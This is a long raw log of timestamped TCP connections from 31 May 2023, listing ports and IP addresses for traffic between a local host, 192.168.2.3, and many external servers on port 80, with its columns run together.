                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.192662001 CEST5010980192.168.2.334.228.163.56
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.289244890 CEST8050099202.254.236.40192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.292952061 CEST5009980192.168.2.3202.254.236.40
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.295969963 CEST5010980192.168.2.334.228.163.56
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.299669027 CEST4982380192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.300564051 CEST5011180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.314311028 CEST805006659.106.19.204192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.318747997 CEST5006680192.168.2.359.106.19.204
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.381444931 CEST805006970.39.251.249192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.387208939 CEST5006980192.168.2.370.39.251.249
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.441390991 CEST805010934.228.163.56192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.443795919 CEST805010934.228.163.56192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.443825960 CEST805010934.228.163.56192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.443845034 CEST805010934.228.163.56192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.443864107 CEST805010934.228.163.56192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.443882942 CEST805010934.228.163.56192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.449019909 CEST5010980192.168.2.334.228.163.56
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.495059013 CEST5011080192.168.2.3188.165.133.163
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.495219946 CEST5010880192.168.2.33.19.116.195
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.515357971 CEST8050110188.165.133.163192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.515407085 CEST8050110188.165.133.163192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.515467882 CEST5011080192.168.2.3188.165.133.163
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.578222036 CEST8049823211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.580651999 CEST8050111211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.582117081 CEST4982380192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.582191944 CEST5011180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.582767963 CEST5011180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.611043930 CEST8050093135.181.73.98192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.611264944 CEST5009380192.168.2.3135.181.73.98
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.650209904 CEST80501083.19.116.195192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.650254011 CEST80501083.19.116.195192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.650377989 CEST5010880192.168.2.33.19.116.195
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.695225000 CEST5010880192.168.2.33.19.116.195
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.695411921 CEST5011280192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.707499027 CEST5011080192.168.2.3188.165.133.163
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.727833986 CEST8050110188.165.133.163192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.728060007 CEST5011080192.168.2.3188.165.133.163
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.850253105 CEST80501083.19.116.195192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.862910032 CEST805011269.163.239.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.863122940 CEST8050111211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.863193035 CEST8050111211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.863729000 CEST5011280192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.863889933 CEST5011180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.931797028 CEST5011180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.951800108 CEST5011280192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957233906 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957264900 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957283974 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957304955 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957323074 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957340956 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957360029 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957377911 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957396030 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957413912 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957978010 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.957998037 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.958013058 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.959043980 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.959274054 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.028410912 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.032474995 CEST5011480192.168.2.351.79.51.72
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.048185110 CEST4982680192.168.2.3172.67.165.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.049400091 CEST5011580192.168.2.3172.67.165.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.064985991 CEST8049826172.67.165.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.065104961 CEST4982680192.168.2.3172.67.165.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.066028118 CEST8050115172.67.165.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.066157103 CEST5011580192.168.2.3172.67.165.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.067754984 CEST5011580192.168.2.3172.67.165.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.071141958 CEST4982080192.168.2.3217.19.237.54
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.072019100 CEST5011680192.168.2.3217.19.237.54
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.073860884 CEST4981980192.168.2.3108.167.164.216
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.074847937 CEST5011780192.168.2.3108.167.164.216
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.084378958 CEST8050115172.67.165.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.095464945 CEST8049820217.19.237.54192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.095812082 CEST8050116217.19.237.54192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.095926046 CEST5011680192.168.2.3217.19.237.54
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.096375942 CEST5011680192.168.2.3217.19.237.54
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.103563070 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.103595972 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.103615046 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.103636026 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.103773117 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.103809118 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.103900909 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.103919983 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.103939056 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.103956938 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.104217052 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.104756117 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.104787111 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.104805946 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.104824066 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.104928970 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.105226994 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.105561018 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.105582952 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.105601072 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.105622053 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.105885029 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106041908 CEST8050057157.112.176.4192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106415033 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106415033 CEST5005780192.168.2.3157.112.176.4
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106559992 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106857061 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106878996 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106899023 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106905937 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106919050 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106929064 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106949091 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.106971025 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.107412100 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.107436895 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.107464075 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.107485056 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.118320942 CEST805011269.163.239.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.118853092 CEST805011269.163.239.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.119123936 CEST5011280192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.120187998 CEST8050116217.19.237.54192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.121311903 CEST8050116217.19.237.54192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.121426105 CEST5011680192.168.2.3217.19.237.54
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.135591030 CEST8050115172.67.165.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.135621071 CEST8050115172.67.165.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.135631084 CEST8050115172.67.165.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.135828972 CEST5011580192.168.2.3172.67.165.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.136293888 CEST805011451.79.51.72192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.136460066 CEST5011480192.168.2.351.79.51.72
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.153179884 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.153342962 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.153832912 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.199892998 CEST8049819108.167.164.216192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.200603008 CEST8050117108.167.164.216192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.205679893 CEST5011780192.168.2.3108.167.164.216
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.212430954 CEST8050111211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.215045929 CEST5011180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.247864962 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.247899055 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.247934103 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.248254061 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.248295069 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.248313904 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.248332024 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.248806953 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.248835087 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.248853922 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.248872995 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.249628067 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.249655962 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.249674082 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.249692917 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.250446081 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.250468969 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.250487089 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.250504971 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.251274109 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.251300097 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.251317978 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.251336098 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.252782106 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.252820015 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.252837896 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.252856970 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.252991915 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.253012896 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.253031969 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.253050089 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.253799915 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.253827095 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.253845930 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.253864050 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.254730940 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.254775047 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.254793882 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.254812956 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.255482912 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.255512953 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.255531073 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.255548954 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.256539106 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.256565094 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.256586075 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.256603003 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.259135008 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.259191036 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.259234905 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.259268045 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.259315014 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.278444052 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.318768024 CEST5011480192.168.2.351.79.51.72
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.339982033 CEST5011280192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.358383894 CEST5011780192.168.2.3108.167.164.216
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.369631052 CEST5011880192.168.2.339.99.233.155
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.397458076 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.397490978 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.397512913 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.397532940 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.397707939 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.397780895 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.397800922 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.397819996 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.397838116 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.397839069 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.397984982 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.398646116 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.398705959 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.398823977 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.398844004 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.398864031 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.398869038 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.398889065 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.398895979 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.398916960 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.398941040 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.399730921 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.399760008 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.399780035 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.399799109 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.399830103 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.399930000 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.400509119 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.400535107 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.400552034 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.400572062 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.401148081 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.401376009 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.401400089 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.401418924 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.401438951 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.401443958 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.401468039 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.401501894 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.402168989 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.402194977 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.402211905 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.402225018 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.402230024 CEST8050102104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.402249098 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.402278900 CEST5010280192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.422688961 CEST805011451.79.51.72192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.422718048 CEST805011451.79.51.72192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.422821045 CEST5011480192.168.2.351.79.51.72
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.425158024 CEST5011480192.168.2.351.79.51.72
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.464744091 CEST4984380192.168.2.3172.67.70.223
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.465567112 CEST5011980192.168.2.3172.67.70.223
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.477217913 CEST805005693.187.206.66192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.477354050 CEST5005680192.168.2.393.187.206.66
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.481492996 CEST8049843172.67.70.223192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.482012987 CEST8050119172.67.70.223192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.482278109 CEST4984380192.168.2.3172.67.70.223
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.482367039 CEST5011980192.168.2.3172.67.70.223
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.482800007 CEST5011980192.168.2.3172.67.70.223
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.484060049 CEST8050117108.167.164.216192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.492535114 CEST8050117108.167.164.216192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.492620945 CEST5011780192.168.2.3108.167.164.216
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.499224901 CEST8050119172.67.70.223192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.506422043 CEST805011269.163.239.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.506696939 CEST805011269.163.239.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.512729883 CEST5011280192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.512921095 CEST4982880192.168.2.396.127.180.42
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.528986931 CEST805011451.79.51.72192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620630980 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620663881 CEST8050113104.218.10.254192.168.2.3
